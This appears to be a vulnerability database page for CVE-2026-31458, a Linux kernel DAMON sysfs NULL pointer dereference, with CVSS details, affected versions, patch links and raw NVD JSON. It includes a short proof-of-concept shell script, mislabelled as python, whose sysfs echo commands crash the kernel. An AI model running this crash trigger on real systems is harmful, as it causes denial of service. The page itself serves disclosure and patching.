CVE-2026-31458

Description

In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs: check contexts->nr before accessing contexts_arr[0] Multiple sysfs command paths dereference contexts_arr[0] without first verifying that kdamond->contexts->nr == 1. A user can set nr_contexts to 0 via sysfs while DAMON is running, causing NULL pointer dereferences. In more detail, the issue can be triggered by privileged users like below. First, start DAMON and make contexts directory empty (kdamond->contexts->nr == 0). # damo start # cd /sys/kernel/mm/damon/admin/kdamonds/0 # echo 0 > contexts/nr_contexts Then, each of below commands will cause the NULL pointer dereference. # echo update_schemes_stats > state # echo update_schemes_tried_regions > state # echo update_schemes_tried_bytes > state # echo update_schemes_effective_quotas > state # echo update_tuned_intervals > state Guard all commands (except OFF) at the entry point of damon_sysfs_handle_cmd().

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE

Linux Kernel (修复补丁发布前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-31458: Linux Kernel DAMON NULL Pointer Dereference
# Requires local access and privileges to modify sysfs

# 1. Start DAMON
damo start

# 2. Set context count to 0 via sysfs
cd /sys/kernel/mm/damon/admin/kdamonds/0
echo 0 > contexts/nr_contexts

# 3. Trigger NULL pointer dereference by updating state
echo update_schemes_stats > state
# This command causes the kernel to crash because contexts_arr[0] is NULL

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31458
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31458
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31458/
[4] VulDB https://vuldb.com/cve/CVE-2026-31458
[5] https://git.kernel.org/stable/c/1bfe9fb5ed2667fb075682408b776b5273162615
[6] https://git.kernel.org/stable/c/1e8da792672481d603fa7cd0d815577220a3ee27
[7] https://git.kernel.org/stable/c/708033c231bd782858f4ddbb46ee874a5a5fbdab
[8] https://git.kernel.org/stable/c/aba546061341b56e9ffb37e1eb661a3628b6ec12
[9] https://git.kernel.org/stable/c/bbe03ad3fb9e714191757ca7b41582f930be7be2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31458", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:41.260", "lastModified": "2026-05-05T21:23:03.250", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/damon/sysfs: check contexts->nr before accessing contexts_arr[0]\n\nMultiple sysfs command paths dereference contexts_arr[0] without first\nverifying that kdamond->contexts->nr == 1. A user can set nr_contexts to\n0 via sysfs while DAMON is running, causing NULL pointer dereferences.\n\nIn more detail, the issue can be triggered by privileged users like\nbelow.\n\nFirst, start DAMON and make contexts directory empty\n(kdamond->contexts->nr == 0).\n\n # damo start\n # cd /sys/kernel/mm/damon/admin/kdamonds/0\n # echo 0 > contexts/nr_contexts\n\nThen, each of below commands will cause the NULL pointer dereference.\n\n # echo update_schemes_stats > state\n # echo update_schemes_tried_regions > state\n # echo update_schemes_tried_bytes > state\n # echo update_schemes_effective_quotas > state\n # echo update_tuned_intervals > state\n\nGuard all commands (except OFF) at the entry point of\ndamon_sysfs_handle_cmd()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.18", "versionEndExcluding": "6.6.131", "matchCriteriaId": "D97A2DBE-7050-465E-8B7D-E7D3C8122FA9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.80", "matchCriteriaId": "97EB19EC-A11E-49C6-9D2F-6F6EC6CB98B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.21", "matchCriteriaId": "ED39847A-3B46-4729-B7CA-B2C30B9FA8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1bfe9fb5ed2667fb075682408b776b5273162615", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1e8da792672481d603fa7cd0d815577220a3ee27", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/708033c231bd782858f4ddbb46ee874a5a5fbdab", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/aba546061341b56e9ffb37e1eb661a3628b6ec12", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bbe03ad3fb9e714191757ca7b41582f930be7be2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}